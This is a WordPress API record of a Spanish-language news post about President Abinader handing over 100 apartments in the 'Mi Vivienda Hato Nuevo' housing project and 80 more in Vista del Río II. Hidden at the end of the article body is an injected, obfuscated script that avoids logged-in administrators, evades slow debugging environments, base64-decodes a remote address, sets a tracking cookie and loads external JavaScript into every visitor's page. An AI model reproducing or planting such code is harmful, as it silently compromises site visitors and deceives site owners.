{"id":13356,"date":"2023-01-16T10:00:19","date_gmt":"2023-01-16T14:00:19","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13356"},"modified":"2023-01-16T10:00:19","modified_gmt":"2023-01-16T14:00:19","slug":"presidente-abinader-entrega-100-apartamentos-en-mi-vivienda-hato-nuevo-con-inversion-de-rd-3337-9-millones","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13356","title":{"rendered":"Abinader entrega 100 apartamentos en \u201cMi Vivienda Hato Nuevo\u201d con inversi\u00f3n de RD 3,337.9 millones"},"content":{"rendered":"<p>Hato Mayor.-\u00a0<strong>El Presidente Luis Abinader y el Ministro de la Vivienda y Edificaciones, Carlos Bonilla,\u00a0<\/strong>entregaron la\u00a0<strong>tercera etapa del proyecto \u201cMi Vivienda Hato Nuevo\u201d,<\/strong>\u00a0compuesta por 100 nuevos apartamentos, completando as\u00ed\u00a0<strong>un total de 600 unidades<\/strong>\u00a0adjudicadas en esa localidad.<\/p>\n<p>El Gobierno ha realizado en este proyecto una inversi\u00f3n de\u00a0<strong>3,337.9 millones de pesos<\/strong>\u00a0que beneficia a m\u00e1s de\u00a0<strong>4,400 personas<\/strong>. Esto ha impactado de manera positiva la econom\u00eda local a trav\u00e9s de la\u00a0<strong>generaci\u00f3n de m\u00e1s de 2,400 empleos directos e indirectos<\/strong>.<\/p>\n<p>Con estas nuevas viviendas, el\u00a0<strong>MIVED suma m\u00e1s de 2000 unidades<\/strong>\u00a0entregadas en todo el territorio nacional en tan solo 2 a\u00f1os.<\/p>\n<p>\u201cMi Vivienda Hato Nuevo\u201d es una\u00a0<strong>urbanizaci\u00f3n\u00a0<\/strong>que est\u00e1 siendo desarrollada sobre m\u00e1s de<strong>\u00a0153,000 metros cuadrados<\/strong>. El proyecto tendr\u00e1 un total de\u00a0<strong>1,232 unidades de apartamentos de 3 y 2 habitaciones.<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/enterarterd.com\/wp-content\/uploads\/2025\/12\/IMG_6310.jpg\" alt=\"\" width=\"4073\" height=\"2910\" data-entity-type=\"file\" data-entity-uuid=\"196ad9fe-da34-4ef9-84cd-78ec25b7bb1c\" \/><\/p>\n<p><strong>Proyecto habitacional Vista del R\u00edo ll, San Juan de la Maguana<\/strong><\/p>\n<p>En su jornada del s\u00e1bado por la provincia San Juan, el mandatario hizo formal entrega de\u00a0<strong>80 apartamentos<\/strong>\u00a0a igual n\u00famero de familias en el\u00a0<strong>proyecto habitacional Vista del R\u00edo ll.<\/strong><\/p>\n<p>En la actividad acompa\u00f1aron al Presidente, el Ministro de Energ\u00eda y Minas, Antonio Almonte, y el de Vivienda y Edificaciones, Carlos Bonilla; la gobernadora por la provincia Santo Domingo, Altagracia Julia Drullard; el senador por Santo Domingo, Antonio Taveras; el director municipal de La Victoria, Miguel Savi\u00f1\u00f3n, y el de los Centros Tecnol\u00f3gicos Comunitarios, Isidro Torres.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hato Mayor.-\u00a0El Presidente Luis Abinader y el Ministro de la Vivienda y Edificaciones, Carlos Bonilla,\u00a0entregaron la\u00a0tercera etapa del proyecto \u201cMi Vivienda Hato Nuevo\u201d,\u00a0compuesta por 100 nuevos apartamentos, completando as\u00ed\u00a0un total de 600 unidades\u00a0adjudicadas en esa localidad. El Gobierno ha realizado en este proyecto una inversi\u00f3n de\u00a03,337.9 millones de pesos\u00a0que beneficia a m\u00e1s de\u00a04,400 personas. Esto [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13358,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13356","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13356","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13356"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13356\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13358"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13356"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}